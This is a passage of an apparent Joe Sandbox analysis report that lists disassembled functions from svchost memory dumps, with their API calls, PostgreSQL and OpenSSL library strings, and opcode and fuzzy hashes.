                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D18C6
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D1985
                                                                                              • Part of subcall function 00007FFDA36EBD40: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36EBD58
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_strdupmalloc$memcpystrcmp
                                                                                            • String ID: ,p=$,r=%s$SCRAM-SHA-256-PLUS$c=biws$c=eSws$could not calculate client proof: %s$could not encode cbind data for channel binding$could not encode client proof$out of memory
                                                                                            • API String ID: 1207038400-2601969620
                                                                                            • Opcode ID: f12a3d76f4b0ee92abc48bed4795ee9702bc244d5a88383c8a4ac88de3b9132d
                                                                                            • Instruction ID: b6ee6b699129bfcd9d4183a26d774b2712c4bc4ff18d9a19eb2cce364f418a4d
                                                                                            • Opcode Fuzzy Hash: f12a3d76f4b0ee92abc48bed4795ee9702bc244d5a88383c8a4ac88de3b9132d
                                                                                            • Instruction Fuzzy Hash: 0A815122F0AA4685FB40DBA5D8601BC2362BF45B84F5C2032DD0D6B766DF7EE549C348
                                                                                            Function 66010A90 Relevance: 34.9, APIs: 23, Instructions: 421COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: ae96b8fd4d29a88afae375eff51ec1507d8c4e4b28cbf41c2ada3f9e8c9deeca
                                                                                            • Instruction ID: 0399383f2e8ee5e9b7dd2222e973a621b8aeb5446636d54a91f237d9c4cfe60f
                                                                                            • Opcode Fuzzy Hash: ae96b8fd4d29a88afae375eff51ec1507d8c4e4b28cbf41c2ada3f9e8c9deeca
                                                                                            • Instruction Fuzzy Hash: DFD14A66D2D2908AE3218FE994A031EFF819313349F845836F6E71B744D9BEC995CB81
                                                                                            Function 00007FFDA367C3C0 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 270COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$R_vset_error
                                                                                            • String ID: ssl\statem\statem_clnt.c$tls_construct_client_hello
                                                                                            • API String ID: 4275876640-3515996699
                                                                                            • Opcode ID: a9b46b3c7ad949edce65097b95c8b7c8cddc4bba1d7a4d60cc6dd7aa523a75c5
                                                                                            • Instruction ID: 40744d6d0dec15c7f1ad1acef1a1843ea117cb48f23492911b20447e1467792b
                                                                                            • Opcode Fuzzy Hash: a9b46b3c7ad949edce65097b95c8b7c8cddc4bba1d7a4d60cc6dd7aa523a75c5
                                                                                            • Instruction Fuzzy Hash: 8DB1B161B0E68282FB60AF2294653BA1697AF45BC4F4C6031DE0DA77C7DF3EE5018359
                                                                                            Function 00007FFDA36E4720 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 209COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,00007FFDA36E3B2C), ref: 00007FFDA36E4766
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,00007FFDA36E3B2C), ref: 00007FFDA36E47C7
                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FFDA36E3B2C), ref: 00007FFDA36E47EC
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FFDA36E3B2C), ref: 00007FFDA36E48D4
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FFDA36E3B2C), ref: 00007FFDA36E49B5
                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00007FFDA36E3B2C), ref: 00007FFDA36E49E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputs$__acrt_iob_funcmalloc
                                                                                            • String ID: %s$ %*s $ %-*s $%*s$%-*s$%s$</tr>$<th align="%s">%s</th>$<tr>$left$out of memory$right
                                                                                            • API String ID: 2678454269-3069757763
                                                                                            • Opcode ID: d07799e9799ad9d9cbbbf601a676d00b4c6089649752e3fc53550fcb8d24f395
                                                                                            • Instruction ID: ad2fee1b0854e4c6f46a848b742e19340dad65f275cd6ce43e54fc2796b586d9
                                                                                            • Opcode Fuzzy Hash: d07799e9799ad9d9cbbbf601a676d00b4c6089649752e3fc53550fcb8d24f395
                                                                                            • Instruction Fuzzy Hash: 2C91D162B0E6C649FB128F21E4657793BA6EB45B80F5DA031CA4D23797DE3EE449C304
                                                                                            Function 66011230 Relevance: 33.4, APIs: 22, Instructions: 429COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f345c3b3a6635b3bef1e636daf6e259eb9111e97f0940e7577f8acf8d8316648
                                                                                            • Instruction ID: 014d45c154ece06d65c182b44084f091cc6b24eca6fc87178b8c121239af04ea
                                                                                            • Opcode Fuzzy Hash: f345c3b3a6635b3bef1e636daf6e259eb9111e97f0940e7577f8acf8d8316648
                                                                                            • Instruction Fuzzy Hash: 0EC13552D4C2B947FA1816DD5C803ADEE81B33B7CDFC059B2CA665BB45D6A8CC83C285
                                                                                            Function 66011742 Relevance: 33.1, APIs: 22, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 79b172a9809d6d36bb60e132cc0a253c3a67b18847ccd8528808583213d05bf1
                                                                                            • Instruction ID: 7370841f1a2db6b6f95e04e7b1f327c710ee35ad5548ac5ab7102130fe4d5bce
                                                                                            • Opcode Fuzzy Hash: 79b172a9809d6d36bb60e132cc0a253c3a67b18847ccd8528808583213d05bf1
                                                                                            • Instruction Fuzzy Hash: E50168005AE15A8FA605A3F95CA93AEEF00DB5725CBD07F73C12C83681CBDCDC559162
                                                                                            Function 6601178F Relevance: 33.1, APIs: 22, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 5a9b6a69ca4161b9e4467e14409498a0b46f1e0686fdb288a2da727970e05430
                                                                                            • Instruction ID: 3965c9411f446cfaf19b0615955f3f886447c4a39c16928c575a7b8724fefeab
                                                                                            • Opcode Fuzzy Hash: 5a9b6a69ca4161b9e4467e14409498a0b46f1e0686fdb288a2da727970e05430
                                                                                            • Instruction Fuzzy Hash: 780168005AE15A8FA605A3F95CA83AEEF409B5735CBD03F73C16C87681CBDCDC559162
                                                                                            Function 660117DC Relevance: 33.1, APIs: 22, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 62976b3dd1c69234feecdb0dd1c7db40d8a03acb28632471c681a6e51e8a22bb
                                                                                            • Instruction ID: 64b46981cc7b88f7f4bb3d8b8f1ffbdabe7878647c766d48b3992e4b9308a69e
                                                                                            • Opcode Fuzzy Hash: 62976b3dd1c69234feecdb0dd1c7db40d8a03acb28632471c681a6e51e8a22bb
                                                                                            • Instruction Fuzzy Hash: BC0168005AE15A8FA605A3F95CA83AEEF009B5735CBD03F77C12C87681CBDCDC559162
                                                                                            Function 66011829 Relevance: 33.1, APIs: 22, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 8dab0fafdf5eb04351e9aadc300599113ce4e66e0723dcaf7fee12093ab501c1
                                                                                            • Instruction ID: 4164f02b0dda3970ffe75b4ac8c7cf4f31ee15beb78084a7f9787420872eb15b
                                                                                            • Opcode Fuzzy Hash: 8dab0fafdf5eb04351e9aadc300599113ce4e66e0723dcaf7fee12093ab501c1
                                                                                            • Instruction Fuzzy Hash: 420198004AE15A8FA205A3F84CA83AEEF00AF5728CBC03F73D12C83280CBDCDC559162
                                                                                            Function 66011876 Relevance: 33.1, APIs: 22, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID:
                                                                                            • API String ID: 4206212132-0
                                                                                            • Opcode ID: 26af5d0348f6a54a36a3667707fcfb94566ef1c56ec22d7fadeb65ff4c4ef6d4
                                                                                            • Instruction ID: 6fb76af64835532a4e73abda8fe6c85793281d701295d68345e55d30e730b48b
                                                                                            • Opcode Fuzzy Hash: 26af5d0348f6a54a36a3667707fcfb94566ef1c56ec22d7fadeb65ff4c4ef6d4
                                                                                            • Instruction Fuzzy Hash: 20015A005AE16A8FA605A7F96CA836EEF009F5725CBD03F73C11C83681CB98DC599162
                                                                                            Function 00007FFDA36E8770 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36F5490: isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F5516
                                                                                              • Part of subcall function 00007FFDA36F5490: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5539
                                                                                              • Part of subcall function 00007FFDA36F5490: islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5545
                                                                                              • Part of subcall function 00007FFDA36F5490: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F55A7
                                                                                            • inet_pton.WS2_32 ref: 00007FFDA36E87CF
                                                                                            • X509_get_ext_d2i.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E880F
                                                                                            • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E882E
                                                                                            • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E8848
                                                                                            • ASN1_STRING_get0_data.LIBCRYPTO-3-X64 ref: 00007FFDA36E8893
                                                                                            • ASN1_STRING_length.LIBCRYPTO-3-X64 ref: 00007FFDA36E889E
                                                                                            • ASN1_STRING_get0_data.LIBCRYPTO-3-X64 ref: 00007FFDA36E88E0
                                                                                            • ASN1_STRING_length.LIBCRYPTO-3-X64 ref: 00007FFDA36E88EB
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36E891C
                                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-3-X64 ref: 00007FFDA36E8947
                                                                                            • X509_get_subject_name.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E8958
                                                                                            • X509_NAME_get_index_by_NID.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,00007FFDA36E7CA5), ref: 00007FFDA36E8970
                                                                                            • X509_NAME_get_entry.LIBCRYPTO-3-X64 ref: 00007FFDA36E8989
                                                                                            • X509_NAME_ENTRY_get_data.LIBCRYPTO-3-X64 ref: 00007FFDA36E8991
                                                                                            • OPENSSL_sk_pop_free.LIBCRYPTO-3-X64 ref: 00007FFDA36E89BB
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36E8A29
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: X509_$G_get0_dataG_lengthL_sk_pop_free_errnofree$E_get_entryE_get_index_by_L_sk_numL_sk_valueX509_get_ext_d2iX509_get_subject_nameY_get_datainet_ptonisdigitislowerisspaceisxdigitlibintl_dgettext
                                                                                            • String ID: SSL certificate's address entry is missing$SSL certificate's name entry is missing
                                                                                            • API String ID: 2138642427-228965108
                                                                                            • Opcode ID: 06598c1850be35af291b887ff2bcad40ee217c7f5a1a08535ae7aa15870da6ec
                                                                                            • Instruction ID: 117e4b2f5b7eedfd9555aa7201523a1b203f66763d65dc842e2ab6d8957adcc0
                                                                                            • Opcode Fuzzy Hash: 06598c1850be35af291b887ff2bcad40ee217c7f5a1a08535ae7aa15870da6ec
                                                                                            • Instruction Fuzzy Hash: F7719221B0B64245FA649F1694647BA2392AF84FC0F2C6031EE4E67787DF3EE5098708
                                                                                            Function 66012970 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 156COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: B$~
                                                                                            • API String ID: 0-3389668641
                                                                                            • Opcode ID: 0212c1db6f743c84e300394e62da1c33dec591be78bacb6d674b35509949d6a5
                                                                                            • Instruction ID: f098a254a53350fbaa60f5dd94fdb3b3bd2723cb2df1011593ae929d7b56a854
                                                                                            • Opcode Fuzzy Hash: 0212c1db6f743c84e300394e62da1c33dec591be78bacb6d674b35509949d6a5
                                                                                            • Instruction Fuzzy Hash: C1411662A1D1D08AE321CBF8585034EFE90D78374CF805636E99C4BB85DBB9CACAC701
                                                                                            Function 00007FFDA36DD120 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 99stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strncmp$isdigit
                                                                                            • String ID: COPY $DELETE $FETCH $INSERT $MERGE $MOVE $SELECT $UPDATE $could not interpret result from server: %s
                                                                                            • API String ID: 1602326022-2133127423
                                                                                            • Opcode ID: e81b60ef051d0d388a3d434c21f2c968fecab9034280d4eec6985afcf63c1a1b
                                                                                            • Instruction ID: cbbd47c8cf4adb5ac4f8c0e1b6e9104f162c520e7be4e6fcc1b4940c4a0e5c05
                                                                                            • Opcode Fuzzy Hash: e81b60ef051d0d388a3d434c21f2c968fecab9034280d4eec6985afcf63c1a1b
                                                                                            • Instruction Fuzzy Hash: 63414052B0AE03A1FF709F11E8602756762FF04BC4F5C6035C64E976A6EE2EE509C318
                                                                                            Function 66011C50 Relevance: 30.1, APIs: 20, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb28f72f6592609cf4d21a195de0ed0adb42e32375e935bc0d71a0d2eec73327
                                                                                            • Instruction ID: 192359993db2c8d718cc06c339a81297c1da460534435a0e025d700669a48dda
                                                                                            • Opcode Fuzzy Hash: fb28f72f6592609cf4d21a195de0ed0adb42e32375e935bc0d71a0d2eec73327
                                                                                            • Instruction Fuzzy Hash: 86414622A6D1958BD31997F8D89479DFE409B6374CFC06A72D91807B94C6EDCD81C702
                                                                                            Function 66012820 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
